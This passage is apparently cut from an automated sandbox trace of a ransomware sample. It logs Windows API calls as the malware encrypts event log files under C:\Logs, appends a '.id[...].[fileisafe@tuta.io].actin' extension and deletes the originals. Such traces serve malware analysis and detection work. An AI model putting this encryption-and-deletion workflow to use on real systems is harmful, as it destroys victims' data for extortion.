lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0060.195] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71c40) returned 1 [0060.195] CryptSetKeyParam (hKey=0xf71c40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0060.195] ReadFile (in: hFile=0x330, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x101000, lpOverlapped=0x0) returned 1 [0060.612] CryptEncrypt (in: hKey=0xf71c40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x101010, dwBufLen=0x101010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x101010) returned 1 [0060.614] WriteFile (in: hFile=0x328, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x101010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x101010, lpOverlapped=0x0) returned 1 [0060.636] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71e40) returned 1 [0060.636] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0060.636] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xb0, dwBufLen=0xb0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xb0) returned 1 [0060.636] CryptDestroyKey (hKey=0xf71e40) returned 1 [0060.636] WriteFile (in: hFile=0x328, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x162, lpOverlapped=0x0) returned 1 [0060.636] CryptDestroyKey (hKey=0xf71c40) returned 1 [0060.636] CloseHandle (hObject=0x330) returned 1 [0060.636] CloseHandle (hObject=0x328) returned 1 [0061.127] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-applicationresourcemanagementsystem%4operational.evtx")) returned 1 [0061.129] SetEvent (hEvent=0x2e8) returned 1 [0061.129] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0061.129] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0061.129] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0061.130] CloseHandle (hObject=0x328) returned 1 [0061.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx")) returned 0x20 [0061.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0061.130] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0061.130] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0061.130] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0061.130] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0061.131] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72180) returned 1 [0061.131] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0061.131] ReadFile (in: hFile=0x328, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0061.133] CryptEncrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0061.133] WriteFile (in: hFile=0x334, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0061.135] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf720c0) returned 1 [0061.135] CryptSetKeyParam (hKey=0xf720c0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0061.135] CryptEncrypt (in: hKey=0xf720c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x90, dwBufLen=0x90 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x90) returned 1 [0061.135] CryptDestroyKey (hKey=0xf720c0) returned 1 [0061.135] WriteFile (in: hFile=0x334, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x142, lpOverlapped=0x0) returned 1 [0061.135] CryptDestroyKey (hKey=0xf72180) returned 1 [0061.135] CloseHandle (hObject=0x328) returned 1 [0061.135] CloseHandle (hObject=0x334) returned 1 [0061.137] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeployment%4operational.evtx")) returned 1 [0061.138] SetEvent (hEvent=0x2e8) returned 1 [0061.138] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0061.138] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0061.138] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=2166784) returned 1 [0061.138] CloseHandle (hObject=0x334) returned 1 [0061.138] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx")) returned 0x20 [0061.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0061.139] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0061.139] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0061.139] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0061.139] ReadFile (in: hFile=0x334, lpBuffer=0x3b30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3b30058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0061.143] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0xb0555, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0061.143] ReadFile (in: hFile=0x334, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0061.146] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x1d1000, lpNewFilePointer=0x0, dwMoveMethod=0x37afe20 | out: lpNewFilePointer=0x0) returned 1 [0061.146] ReadFile (in: hFile=0x334, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x37afe2c, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x37afe2c*=0x40000, lpOverlapped=0x0) returned 1 [0061.159] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe10, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe7c | out: phKey=0x37afe7c*=0xf71e80) returned 1 [0061.159] CryptSetKeyParam (hKey=0xf71e80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0061.159] CryptEncrypt (in: hKey=0xf71e80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe30*=0xc00b0, dwBufLen=0xc00b0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe30*=0xc00b0) returned 1 [0061.160] CryptDestroyKey (hKey=0xf71e80) returned 1 [0061.161] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe58 | out: lpNewFilePointer=0x0) returned 1 [0061.161] WriteFile (in: hFile=0x334, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xc0162, lpNumberOfBytesWritten=0x37afe68, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe68*=0xc0162, lpOverlapped=0x0) returned 1 [0061.547] SetEndOfFile (hFile=0x334) returned 1 [0061.547] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x1d1000, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0061.548] WriteFile (in: hFile=0x334, lpBuffer=0x3bf019a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf019a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0061.549] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0xb0555, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0061.549] WriteFile (in: hFile=0x334, lpBuffer=0x3bf019a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf019a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0061.551] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe28 | out: lpNewFilePointer=0x0) returned 1 [0061.551] WriteFile (in: hFile=0x334, lpBuffer=0x3bf019a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x37afe34, lpOverlapped=0x0 | out: lpBuffer=0x3bf019a*, lpNumberOfBytesWritten=0x37afe34*=0x40000, lpOverlapped=0x0) returned 1 [0061.553] CloseHandle (hObject=0x334) returned 1 [0062.543] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0062.543] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0062.544] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0062.544] CloseHandle (hObject=0x334) returned 1 [0062.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx")) returned 0x20 [0062.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0062.544] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0062.544] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0062.544] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0062.545] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0062.545] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71c80) returned 1 [0062.545] CryptSetKeyParam (hKey=0xf71c80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0062.545] ReadFile (in: hFile=0x334, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0062.546] CryptEncrypt (in: hKey=0xf71c80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0062.546] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0062.548] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71e40) returned 1 [0062.548] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0062.548] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x90, dwBufLen=0x90 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x90) returned 1 [0062.548] CryptDestroyKey (hKey=0xf71e40) returned 1 [0062.548] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x142, lpOverlapped=0x0) returned 1 [0062.548] CryptDestroyKey (hKey=0xf71c80) returned 1 [0062.548] CloseHandle (hObject=0x334) returned 1 [0062.548] CloseHandle (hObject=0x2e4) returned 1 [0062.550] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx")) returned 1 [0062.551] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0062.551] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0062.552] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=1052672) returned 1 [0062.552] CloseHandle (hObject=0x2e4) returned 1 [0062.552] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx")) returned 0x20 [0062.552] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0062.552] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0062.552] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0062.552] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0062.552] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0062.936] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71dc0) returned 1 [0062.936] CryptSetKeyParam (hKey=0xf71dc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0062.936] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x101000, lpOverlapped=0x0) returned 1 [0062.952] CryptEncrypt (in: hKey=0xf71dc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x101010, dwBufLen=0x101010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x101010) returned 1 [0062.954] WriteFile (in: hFile=0x30c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x101010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x101010, lpOverlapped=0x0) returned 1 [0062.973] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71c00) returned 1 [0062.973] CryptSetKeyParam (hKey=0xf71c00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0062.974] CryptEncrypt (in: hKey=0xf71c00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xc0, dwBufLen=0xc0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xc0) returned 1 [0062.974] CryptDestroyKey (hKey=0xf71c00) returned 1 [0062.974] WriteFile (in: hFile=0x30c, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x172, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x172, lpOverlapped=0x0) returned 1 [0062.974] CryptDestroyKey (hKey=0xf71dc0) returned 1 [0062.974] CloseHandle (hObject=0x2e4) returned 1 [0062.974] CloseHandle (hObject=0x30c) returned 1 [0063.184] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicemanagement-enterprise-diagnostics-provider%4admin.evtx")) returned 1 [0063.186] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0063.186] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0063.186] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=69632) returned 1 [0063.186] CloseHandle (hObject=0x30c) returned 1 [0063.186] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx")) returned 0x20 [0063.186] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0063.186] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0063.186] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0063.186] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0063.186] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-diagnostics-performance%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0063.187] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72040) returned 1 [0063.187] CryptSetKeyParam (hKey=0xf72040, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0063.187] ReadFile (in: hFile=0x30c, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x11000, lpOverlapped=0x0) returned 1 [0063.189] CryptEncrypt (in: hKey=0xf72040, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010, dwBufLen=0x11010 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x11010) returned 1 [0063.189] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x11010, lpOverlapped=0x0) returned 1 [0063.190] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b00) returned 1 [0063.191] CryptSetKeyParam (hKey=0xf71b00, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0063.191] CryptEncrypt (in: hKey=0xf71b00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xa0, dwBufLen=0xa0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xa0) returned 1 [0063.191] CryptDestroyKey (hKey=0xf71b00) returned 1 [0063.191] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x152, lpOverlapped=0x0) returned 1 [0063.191] CryptDestroyKey (hKey=0xf72040) returned 1 [0063.191] CloseHandle (hObject=0x30c) returned 1 [0063.191] CloseHandle (hObject=0x2e4) returned 1 [0063.193] DeleteFileW 